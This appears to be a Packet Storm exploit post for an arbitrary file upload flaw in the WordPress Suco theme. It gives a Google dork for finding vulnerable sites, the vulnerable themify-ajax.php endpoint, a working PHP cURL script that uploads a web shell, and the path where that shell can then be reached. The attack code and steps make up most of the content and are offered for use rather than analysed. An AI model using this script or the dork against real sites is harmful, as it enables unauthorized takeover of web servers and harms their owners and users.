WordPress Suco theme suffers from a remote shell upload vulnerability.
b2e22a3f07d33f211c40421e70052bfe57231643ebd7db5e5c627b99e766b408#Title : Wordpress Suco Themes Arbitrary File Upload
#Author : DevilScreaM
#Date : 11/20/2013 - 20 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themify.me/
#Link : http://themify.me/themes/suco
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Arbitrary File Upload
#Dork :
inurl:wp-content/themes/suco
Arbitrary File Upload
Exploit : http://SITE-TARGET/wp-content/themes/suco/themify/themify-ajax.php
Script :
<?php
$uploadfile="devilscream.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed